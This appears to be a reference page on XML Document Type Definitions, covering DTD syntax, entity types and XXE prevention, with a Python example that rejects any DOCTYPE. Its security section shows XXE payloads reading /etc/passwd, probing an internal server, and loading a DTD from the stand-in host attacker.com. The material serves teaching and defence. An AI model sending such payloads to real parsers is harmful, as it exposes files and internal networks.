Document Type Definition (DTD)

Document Type Definition (DTD) is a set of markup declarations that define the structure, elements, attributes, and entities of an XML document. DTDs can be internal (within the XML) or external (referenced via URL), and their entity features are the basis for XXE attacks.

DTD Syntax

<?xml version="1.0"?>
<!-- Internal DTD (the XML declaration must come first; the DOCTYPE follows it and precedes the root element) -->
<!DOCTYPE root [
  <!ELEMENT root (child)>
  <!ELEMENT child (#PCDATA)>
  <!ENTITY greeting "Hello World">
]>
<root>
  <child>&greeting;</child>
</root>

<!-- External DTD reference -->
<!DOCTYPE root SYSTEM "http://example.com/schema.dtd">

Entity Types

  • Internal Entity: <!ENTITY name "value">
  • External Entity: <!ENTITY name SYSTEM "URI">
  • Parameter Entity: <!ENTITY % name "value"> (used in DTD only)
  • Public Entity: <!ENTITY name PUBLIC "id" "URI">

Security Implications

<!-- File read via external entity -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- SSRF via external entity -->
<!ENTITY xxe SYSTEM "http://internal-server/">

<!-- External DTD for blind XXE -->
<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">
%ext;

Disabling DTDs

XXE prevention is almost entirely a matter of XML parser configuration: either refuse DTD processing altogether (reject any DOCTYPE declaration, internal or external), or, where a DTD is genuinely needed, disable the resolution of external general and parameter entities specifically.
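The "disable DTDs entirely" option, as an added example (not part of the original page) using only Python's standard-library expat binding: any DOCTYPE aborts the parse before an entity declaration is ever read, and an external-entity handler that returns 0 serves as defence in depth. The function name and the returned element-to-text mapping are this example's own choices.

```python
import xml.parsers.expat


class DtdRejected(ValueError):
    """Raised when an untrusted document carries a DOCTYPE declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source with DTD processing refused.

    Returns a dict mapping each element name to its concatenated text.
    Rejecting the DOCTYPE up front means no <!ENTITY> is ever processed,
    so there is nothing for XXE file reads, SSRF or entity expansion to use.
    """
    parser = xml.parsers.expat.ParserCreate()
    result: dict = {}
    stack: list = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fired at the start of <!DOCTYPE ...>, before the internal subset
        # or the external DTD is read; raising here aborts the parse.
        raise DtdRejected(f"DOCTYPE '{name}' is not allowed in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: returning 0 makes expat stop instead of
        # resolving a SYSTEM/PUBLIC URI, should a DOCTYPE ever slip through.
        return 0

    def on_start(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def on_end(name):
        stack.pop()

    def on_text(text):
        # Character data may arrive in several chunks; concatenate them.
        if stack:
            result[stack[-1]] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return result
```

A document with no DOCTYPE parses normally; the page's own internal-DTD example and the external `SYSTEM "http://example.com/schema.dtd"` reference both raise `DtdRejected`.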

See Also